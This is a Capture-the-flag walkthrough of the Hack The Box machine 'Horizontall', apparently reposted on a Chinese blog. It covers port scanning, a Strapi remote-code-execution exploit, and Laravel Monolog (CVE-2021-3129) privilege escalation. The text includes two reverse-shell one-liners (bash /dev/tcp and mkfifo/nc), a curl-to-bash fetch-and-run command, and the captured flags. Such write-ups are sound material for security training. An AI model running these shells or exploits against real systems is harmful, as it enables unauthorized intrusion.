Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.11.105 | TCP:22,80 |
$ ip='10.10.11.105'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee774143d482bd3e6e6e50cdff6b0dd5 (RSA)
| 256 3ad589d5da9559d9df016837cad510b0 (ECDSA)
|_ 256 4a0004b49d29e7af37161b4f802d9894 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: horizontall
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Strapi RCE
# echo "10.10.11.105 horizontall.htb">>/etc/hosts
![[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图](https://img.4awl.net/img/ab/406da80d7671d74ba046144967eae8.jpg "[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图")
$ feroxbuster -u 'http://horizontall.htb'
![[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图1](https://img.4awl.net/img/4d/309be9767e830556fe46dec49963fa.jpg "[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图1")
http://horizontall.htb/js/app.c68eb462.js
![[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图2](https://img.4awl.net/img/79/8e6ded908eb43a37948d36f905dd38.jpg "[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图2")
# echo "10.10.11.105 api-prod.horizontall.htb">>/etc/hosts
![[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图3](https://img.4awl.net/img/52/ee2c8f2e832227d0cc2b1c5b942008.jpg "[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图3")
$ curl http://api-prod.horizontall.htb/admin/init|jq
![[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图4](https://img.4awl.net/img/99/fb8be713b0c9d6dd8894256952aea2.jpg "[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图4")
$ feroxbuster -u 'http://api-prod.horizontall.htb'
![[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图5](https://img.4awl.net/img/e7/775fb55beef19bceb38568f75ed511.jpg "[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图5")
http://api-prod.horizontall.htb/admin/auth/login
![[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图6](https://img.4awl.net/img/e8/d48efc67de0540235ad4fc3d2d24cf.jpg "[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图6")
https://www.exploit-db.com/exploits/50239
$ python3 exp.py http://api-prod.horizontall.htb
bash -c 'bash -i >& /dev/tcp/10.10.16.28/445 0>&1'
![[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图7](https://img.4awl.net/img/87/62a86a5f4b9f8f7340b9249a0b0657.jpg "[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图7")
User.txt
0985824865581079bb013f166e34e37e
Privilege Escalation:Laravel <= v8.4.2 PHPGGC Monolog RCE
https://github.com/MartinxMax/KTOR/blob/main/ktor.sh
$ curl http://10.10.16.24/ktor.sh|bash -s -- -l -p all
![[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图8](https://img.4awl.net/img/51/0ee3443f07e36351133d91bf73c7bc.jpg "[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图8")
这里通过再靶机使用ssh-keygen命令生成私钥进行登录
$ ssh -i id_rsa -L 8000:localhost:8000 -L 1337:localhost:1337 strapi@10.10.11.105 -t /bin/bash
http://127.0.0.1:8000/
![[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图9](https://img.4awl.net/img/14/055f3030d20b6dbc493b1860d733fa.jpg "[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图9")
$ feroxbuster -u 'http://127.0.0.1:8000/'
![[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图10](https://img.4awl.net/img/92/8dc900f6d38db6e9089dcd9357e574.jpg "[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图10")
![[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图11](https://img.4awl.net/img/c5/b8995f03bec5162585f68488210625.jpg "[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图11")
https://raw.githubusercontent.com/nth347/CVE-2021-3129_exploit/refs/heads/master/exploit.py
$ python3 exp.py http://localhost:8000 Monolog/RCE1 id
![[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图12](https://img.4awl.net/img/e3/957cd8623991927eb92a810484eb5b.jpg "[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图12")
$ python3 exp.py http://localhost:8000 Monolog/RCE1 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.28 10032 >/tmp/f'
![[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图13](https://img.4awl.net/img/b2/e0587d417dac83a0bc897ff2536937.jpg "[Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升插图13")
Root.txt
90ed87c84901a6f1b348da73a1d57d57
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
